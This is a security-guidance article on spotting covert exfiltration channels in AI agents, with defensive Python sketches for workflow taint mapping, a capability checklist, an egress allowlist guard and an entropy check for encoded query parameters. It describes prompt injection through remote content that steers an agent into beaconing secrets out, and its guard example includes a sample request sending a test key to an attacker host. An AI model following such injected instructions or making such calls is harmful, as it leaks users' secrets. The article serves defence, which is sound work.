How can organisations tell whether AI agents are exposed to covert exfiltration paths?

Look for any workflow where the agent can render remote content, call external URLs, or transform retrieved data into network requests. If those steps happen automatically, the agent may have an exfiltration channel even when users never click anything. That signal deserves immediate containment review.

Why This Matters for Security Teams

Covert exfiltration paths in AI agents are hard to spot because the agent does not need a visible “download” step to leak data. Any workflow that can render remote content, fetch external URLs, or convert retrieved text into a request can become a hidden outbound channel. That is why agent risk is not just about model prompts, but about tool access, execution authority, and where outputs are allowed to go.

The problem is amplified by the autonomous nature of agentic systems: an agent can chain tools, follow instructions embedded in content, and move data in ways that look like normal task completion. Guidance in the OWASP Agentic AI Top 10 and NHI research in the report AI Agents: The New Attack Surface point to the same operational reality: exposed agents often leak through legitimate capabilities, not through obviously malware-like behaviour. In practice, many security teams discover exfiltration only after a routine agent workflow has already touched sensitive data and sent it somewhere unexpected.

How It Works in Practice

Security teams should map agent workflows end to end and ask one question at every step: can this action create an outbound side effect? A harmless-looking summarisation task becomes risky if the agent can follow links, open attachments, call APIs, or generate prompts that include secrets, tokens, or internal data. The path is often indirect. For example, a retrieval step can pull sensitive content, a transformation step can encode that content into a URL or request body, and a tool call can send it off-network without user interaction.
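The end-to-end mapping described above can be sketched as a simple taint walk over a workflow. This is a minimal illustration, not a complete analysis: the `Step` fields, the step names, and the `find_exfil_paths` helper are all hypothetical, and it assumes each step has already been labelled by hand as reading sensitive data, producing an outbound side effect, or requiring human approval.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Step:
    """One step in an agent workflow (all fields are illustrative labels)."""
    name: str
    reads_sensitive: bool = False   # e.g. retrieval from an internal store
    outbound: bool = False          # e.g. HTTP call, webhook, remote render
    needs_approval: bool = False    # a human must confirm before it runs


def find_exfil_paths(steps):
    """Return (source, sink) name pairs where sensitive data read earlier
    can reach an outbound step that runs without human approval."""
    findings = []
    tainted_by = []  # names of earlier steps that read sensitive data
    for step in steps:
        if step.outbound and not step.needs_approval:
            findings.extend((src, step.name) for src in tainted_by)
        if step.reads_sensitive:
            tainted_by.append(step.name)
    return findings


# Hypothetical workflow: retrieval, transformation, then an automatic tool call.
workflow = [
    Step("retrieve_customer_notes", reads_sensitive=True),
    Step("summarise"),
    Step("build_lookup_url"),
    Step("http_get", outbound=True),
]

print(find_exfil_paths(workflow))
# [('retrieve_customer_notes', 'http_get')]
```

The walk is deliberately conservative: it treats every step after a sensitive read as carrying that data, which over-reports but matches the "can this action create an outbound side effect?" question asked at each step.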

Detection usually depends on observing both the agent runtime and the tools it can reach. Review browser-like tools, document processors, code interpreters, webhook integrations, and any connector that can talk to external systems. Align that review with NIST AI Risk Management Framework practices for mapping context, function, and impact, and compare findings with NHI breach patterns documented in The 52 NHI breaches Report. Practical indicators include:

  • Agents that can render remote HTML, markdown, or emails with active links.
  • Agents that can call arbitrary URLs or make outbound HTTP requests.
  • Agents that can turn retrieved content into prompts, queries, or API payloads.
  • Agents that have access to long-lived secrets, especially in shared workspaces.
  • Agents that can chain multiple tools without a human approval point.
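As a rough illustration, the indicators above can be turned into a checklist that is run against an inventory of agents. The manifest keys, the agent names, and the `audit_agent` helper below are assumptions made for this sketch; a real inventory would come from whatever agent platform or configuration store the organisation uses.

```python
# Hypothetical manifest keys mapped to the indicators listed above.
INDICATORS = {
    "renders_remote_content": "can render remote HTML, markdown, or emails with active links",
    "arbitrary_http": "can call arbitrary URLs or make outbound HTTP requests",
    "content_to_payload": "can turn retrieved content into prompts, queries, or API payloads",
    "long_lived_secrets": "has access to long-lived secrets",
    "unapproved_chaining": "can chain multiple tools without a human approval point",
}


def audit_agent(manifest):
    """Return the indicator descriptions that apply to one agent manifest."""
    return [desc for key, desc in INDICATORS.items() if manifest.get(key, False)]


# Illustrative inventory; the agents and their capabilities are made up.
inventory = {
    "support-summariser": {"renders_remote_content": True, "arbitrary_http": True},
    "report-formatter": {},
}

for agent, manifest in inventory.items():
    hits = audit_agent(manifest)
    status = "review" if hits else "no indicators"
    print(f"{agent}: {status}")
    for hit in hits:
        print(f"  - {hit}")
```

Any agent with at least one hit is listed for review here; whether a single indicator is enough to trigger containment is a policy decision this sketch does not make.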

Where possible, require workload identity for each agent, enforce short-lived credentials, and inspect egress at the tool boundary rather than only at the network perimeter. These controls tend to break down when agents are given broad connector access in development or test environments and later promoted into production without a fresh containment review.
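One way to picture egress inspection at the tool boundary is a guard that wraps each outbound tool before the agent can call it. The sketch below is an assumption-laden example: the allowlisted hosts, the `check_egress` and `guarded_tool` names, and the idea of passing known secret values to the guard are all hypothetical, and a production control would more likely live in a proxy or policy engine than in application code.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist of hosts this agent's tools may contact.
ALLOWED_HOSTS = {"api.internal.example", "docs.example.com"}


class EgressDenied(Exception):
    """Raised when an outbound tool call fails the boundary check."""


def check_egress(url, body="", secrets=()):
    """Reject calls to non-allowlisted hosts or calls carrying known secrets."""
    host = urlsplit(url).hostname or ""
    if host not in ALLOWED_HOSTS:
        raise EgressDenied(f"host not allowlisted: {host!r}")
    payload = url + "\n" + body
    for secret in secrets:
        if secret and secret in payload:
            raise EgressDenied("outbound payload contains a known secret value")
    return True


def guarded_tool(send, secrets=()):
    """Wrap an outbound tool so every call is checked before it is sent."""
    def wrapper(url, body=""):
        check_egress(url, body, secrets)
        return send(url, body)
    return wrapper


# Usage with a stand-in sender; no real network request is made.
fake_send = lambda url, body="": f"sent to {urlsplit(url).hostname}"
tool = guarded_tool(fake_send, secrets=["sk-test-123"])

print(tool("https://docs.example.com/page"))
try:
    tool("https://attacker.example/collect?d=sk-test-123")
except EgressDenied as exc:
    print("blocked:", exc)
```

Checking at the tool wrapper rather than the network perimeter means the decision can use context the perimeter never sees, such as which agent made the call and which secrets it holds.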

Common Variations and Edge Cases

Tighter outbound controls often increase workflow friction, requiring organisations to balance data-loss prevention against agent usefulness. That tradeoff becomes especially sharp in multi-agent systems, where one agent prepares content and another agent sends it onward. Best practice is still evolving, but current guidance suggests treating any agent that can touch untrusted content as potentially exposed until proven otherwise.

One common edge case is indirect exfiltration through “safe” tools. An agent may not be allowed to email externally, yet it can place content into tickets, logs, chat messages, or dashboards that are later exported. Another is prompt injection via remote content that instructs the agent to retrieve secrets or beacon data out through a lookup parameter. The AI LLM hijack breach and the Anthropic report on AI-orchestrated cyber espionage show how quickly tool chaining can turn a normal task into an exfiltration path. For broader pattern recognition, NHI teams also use the OWASP NHI Top 10 to identify where autonomous behaviour and credential exposure intersect.
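Beaconing through a lookup parameter can sometimes be spotted by looking for long, high-entropy query values in the URLs an agent requests. The following is a heuristic sketch only: the `suspicious_params` helper and both thresholds are assumptions chosen for illustration, long natural-language queries can also trip it, and an attacker who splits data across many short parameters would evade it.

```python
import math
from collections import Counter
from urllib.parse import parse_qsl, urlsplit


def shannon_entropy(value):
    """Shannon entropy of a non-empty string, in bits per character."""
    counts = Counter(value)
    total = len(value)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def suspicious_params(url, min_len=24, min_entropy=3.5):
    """Return names of query parameters whose values are long and
    high-entropy, which may indicate encoded data being smuggled out.
    Both thresholds are illustrative and would need tuning."""
    flagged = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if len(value) >= min_len and shannon_entropy(value) >= min_entropy:
            flagged.append(name)
    return flagged


# An ordinary lookup versus one carrying an encoded blob (hosts are made up).
print(suspicious_params("https://lookup.example/search?q=weather"))
# []
print(suspicious_params(
    "https://lookup.example/search?q=weather&id=c2VjcmV0LWFwaS1rZXktMTIzNDU2Nzg5MA"
))
# ['id']
```

A check like this is best treated as one signal feeding a containment review, not as a standalone block rule.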

The clearest signal is not whether the agent is “allowed” to act, but whether it can do so in a way that silently moves sensitive data across trust boundaries. That is the point where containment, tool restriction, and runtime policy evaluation should be revisited.

Standards & Framework Alignment

This section maps relevant standards and security frameworks to the operational risks and controls described in this guidance.

OWASP Agentic AI Top 10 and CSA MAESTRO address the attack and risk surface, while NIST AI RMF sets the governance and control requirements practitioners need to meet.

Framework | Control / Reference | Relevance
OWASP Agentic AI Top 10 | A3 | Covers tool abuse and prompt-injection paths that enable covert agent exfiltration.
CSA MAESTRO | TA-2 | Addresses agent threat modeling for tool chaining and hidden outbound paths.
NIST AI RMF | - | AI RMF supports mapping agent context, impact, and misuse risk for exfiltration paths.

Restrict tools and inspect agent inputs for instructions that could redirect data out of bounds.